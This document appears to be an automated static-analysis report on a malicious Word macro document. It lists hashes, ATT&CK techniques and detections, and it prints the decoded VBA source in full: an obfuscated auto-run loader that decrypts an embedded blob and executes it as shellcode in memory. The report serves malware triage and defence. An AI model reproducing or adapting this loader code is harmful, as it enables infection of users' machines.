Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 73edebdd13738f52…

MALICIOUS

Office (OLE)

Size: 37.2 KB
Created: 2017-07-25 10:47:00
Authoring application: Microsoft Office Word
First seen: 2017-08-08
MD5: b95ce808b0239fb1ea377c5149cfeef8
SHA-1: bb0307985a32e8e4b626012d0be952e67276f66e
SHA-256: 73edebdd13738f529aa10ba380aad9b28c3c65fea605bf9d1958142208d10e92
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The macro code declares VirtualAlloc, NtWriteVirtualMemory and CreateThread under obfuscated aliases, reads the document's own file from disk, splits off the blob that follows a long marker string, drops its first two characters, XOR-decrypts it with a hard-coded key, copies the result into newly allocated executable memory and starts it in a new thread. That is in-process shellcode execution triggered from Document_Open (with Workbook_Open chaining to the same routine). This behavior is consistent with a downloader that fetches and runs a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader.Powload-6809817-0'. The extracted 'macros.bas' file further supports the macro-based execution.

Heuristics (7)

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        xDevBalyBLEFtnxpHiOKZbXczrTn
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4488 bytes
SHA-256: 9980bba180f5fa652fa6e7f1b20240562ed786f5e3dd26e3af6825bfa641e4b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
36 of 71 identifiers look randomly generated (e.g. 'lPCvkuuqXlJyPtycvRybiUMiAaNwuVicvuJWsciN') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function aQHJDH Lib "kernel32" Alias "CreateThread" (ByVal ZWANBNKHxD As Long, ByVal ApPjvNBo As Long, ByVal MJPpwUNEjK As LongPtr, dxpYB As Long, ByVal kUxFfJIjAynNvzmiezqhkrH As Long, fyNCd As Long) As LongPtr
Private Declare PtrSafe Function GGaggVvzQNkOVtQIuBSnwzHVf Lib "kernel32" Alias "VirtualAlloc" (ByVal pVymXGUabJbSNGyVXTch As Long, ByVal bSDUuc As LongPtr, ByVal LtEAUnjU As Long, ByVal izKYxmqisRdSfCaaVCodV As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal DEMoHfAXzwEoO As LongPtr, ByVal sjFPBvCCYpFQDz As LongPtr, ByVal LVRMQWgljElIvrHoRNGILXzBzQaGx As String, ByVal QBaXOANBYxmYvkpNglqbO As LongPtr, ByRef WRnNwp As LongPtr) As LongPtr
#Else
Private Declare Function aQHJDH Lib "kernel32" Alias "CreateThread"  (ByVal ZWANBNKHxD As Long, ByVal ApPjvNBo As Long, ByVal MJPpwUNEjK As Long, dxpYB As Long, ByVal kUxFfJIjAynNvzmiezqhkrH As Long, fyNCd As Long) As Long
Private Declare Function GGaggVvzQNkOVtQIuBSnwzHVf Lib "kernel32" Alias "VirtualAlloc" (ByVal pVymXGUabJbSNGyVXTch As Long, ByVal bSDUuc As Long, ByVal LtEAUnjU As Long, ByVal izKYxmqisRdSfCaaVCodV As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal DEMoHfAXzwEoO As Long, ByVal sjFPBvCCYpFQDz As Long, ByVal LVRMQWgljElIvrHoRNGILXzBzQaGx As String, ByVal QBaXOANBYxmYvkpNglqbO As Long, ByRef WRnNwp As Long) As Long
#End If

Const sNsJnkihPbkPGdTkxeg = &H1000
Const OmrVsuNVhFQGfobtqta = &H40

Public Sub xDevBalyBLEFtnxpHiOKZbXczrTn()
    Dim ZjsslkibJyUCfVJS() As Byte

    ZjsslkibJyUCfVJS = jxOkpKRdprQXYzxFMqwSUnLnkvfD(ActiveDocument.FullName)
    Dim flLciYDZXvFbWkhYa As String
    flLciYDZXvFbWkhYa = StrConv(ZjsslkibJyUCfVJS, 64)
    
    Dim BmmhcooYJThUgokYlH
    BmmhcooYJThUgokYlH = Split(flLciYDZXvFbWkhYa, "lPCvkuuqXlJyPtycvRybiUMiAaNwuVicvuJWsciNJKvlNCosnJnVjkCqdtVjGYWbcHcvKCJtJKsxzAvXMviLImTlRtTZhYgKOtigzSHLZUmyReRCYXxlPltQNQDrIKmKDHJfsoxTNxLOautNCrajBVVDartIpqcoIBVkvM")

    Dim vQkPtnPDaNoNEeshFo As String
    Dim VLAZTE As String
    Dim nBklnKatYgv As String
    VLAZTE = StrConv(StrConv(BmmhcooYJThUgokYlH(UBound(BmmhcooYJThUgokYlH)), 64), 128)
    nBklnKatYgv = Mid$(VLAZTE, 3, Len(VLAZTE))

    vQkPtnPDaNoNEeshFo = qKNzdvfQwqgpv("JzEyszFQsxQPr", nBklnKatYgv)
    
    #If VBA7 Then
        Dim oSNfYMzNTyDYSzPgv As LongPtr
        Dim qSxnZjkEKrbAUdd As LongPtr
    #Else
        Dim oSNfYMzNTyDYSzPgv As Long
        Dim qSxnZjkEKrbAUdd As Long
    #End If

    oSNfYMzNTyDYSzPgv = GGaggVvzQNkOVtQIuBSnwzHVf(0, Len(vQkPtnPDaNoNEeshFo), sNsJnkihPbkPGdTkxeg, OmrVsuNVhFQGfobtqta)
    qSxnZjkEKrbAUdd = NtWriteVirtualMemory(-1, oSNfYMzNTyDYSzPgv, vQkPtnPDaNoNEeshFo, Len(vQkPtnPDaNoNEeshFo), 0)
    qSxnZjkEKrbAUdd = aQHJDH(0, 0, oSNfYMzNTyDYSzPgv, 0, 0, 0)
End Sub

Public Function jxOkpKRdprQXYzxFMqwSUnLnkvfD(ByVal NgEKoyeGFVeCkzlkPpogzGQiv As String) As Byte()
    Dim VLAZTE As Long
    Dim nBklnKatYgv() As Byte
    VLAZTE = FreeFile
    If LenB(Dir(NgEKoyeGFVeCkzlkPpogzGQiv)) Then
        Open NgEKoyeGFVeCkzlkPpogzGQiv For Binary Access Read As VLAZTE
        ReDim nBklnKatYgv(LOF(VLAZTE) - 1&) As Byte
        Get VLAZTE, , nBklnKatYgv
        Close VLAZTE
    Else
        Err.Raise 53
    End If
    jxOkpKRdprQXYzxFMqwSUnLnkvfD = nBklnKatYgv
    Erase nBklnKatYgv
End Function

Public Sub Document_Open()
    xDevBalyBLEFtnxpHiOKZbXczrTn
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function qKNzdvfQwqgpv(lCsfGczoWXbY As String, FnNAAvQfsilxDNORWv As String) As String
    Dim PZzxaSzsSbOPyeUADIPGTEjSugI As Long
    Dim oLxZCg As String
    Dim CfQNIadYd As Integer, xywgMWE As Integer, a As Long

    For PZzxaSzsSbOPyeUADIPGTEjSugI = 1 To Len(FnNAAvQfsilxDNORWv)
        a = PZzxaSzsSbOPyeUADIPGTEjSugI Mod Len(lCsfGczoWXbY)
        If a = 0 Then a = Len(lCsfGczoWXbY)
        
        CfQNIadYd = Asc(Mid$(FnNAAvQfsilxDNORWv, PZzxaSzsSbOPyeUADIPGTEjSugI, 1))
        xywgMWE = Asc(Mid$(lCsfGczoWXbY, a, 1))
        oLxZCg = oLxZCg + Chr(CfQNIadYd Xor xywgMWE)
    Next PZzxaSzsSbOPyeUADIPGTEjSugI
    
   qKNzdvfQwqgpv = oLxZCg
End Function